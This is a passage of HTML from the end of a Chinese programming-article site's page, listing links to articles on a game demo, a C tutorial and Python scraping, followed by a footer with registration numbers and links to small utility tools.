    <a href="/Article/Index/797709">通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!</a>                            <br />
    <a href="/Article/Index/797716">13 万字 C 语言从入门到精通保姆级教程2021 年版</a>                            <br />
    <a href="/Article/Index/888192">10行代码集2000张美女图,Python爬虫120例,再上征途</a>                            <br />
                        </nobr>
                    </li>
                </ul>
    
            </div>
        </div>
    </div>
    <!-- 主体 -->
    
    
        <!--body结束-->
        <!--这里是footer模板-->
        
        <!--footer-->
    <nav class="navbar navbar-inverse navbar-fixed-bottom">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="text-muted center foot-height">
                        Copyright&nbsp;©&nbsp;2022&nbsp;侵权请联系<a href="mailto:2656653265@qq.com">2656653265@qq.com</a> &nbsp;&nbsp;
                        <a href="https://beian.miit.gov.cn/" target="_blank">京ICP备2022015340号-1</a>
                    </div>
                    <div style="width:300px;margin:0 auto; padding:0px 5px;">
                        <a href="/regex.html">正则表达式工具</a>
                        <a href="/cron.html">cron表达式工具</a>
                        <a href="/pwdcreator.html">密码生成工具</a>
                    </div>
                    <div style="width:300px;margin:0 auto; padding:5px 0;">
                        <a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=11010502049817" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;">
                        <img src="" style="float:left;" /><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">京公网安备 11010502049817号</p></a>
                    </div>
                </div>
            </div>
        </div>
      
    </nav>
    <!--footer-->
    
        <!--footer模板结束-->
    
        <script src="/js/plugins/jquery/jquery.js"></script>
        <script src="/js/bootstrap.min.js"></script>
    
        <!--这里是scripts模板-->
        
    
        
     
    
    
        <!--scripts模板结束-->
    
    </body>
    </html>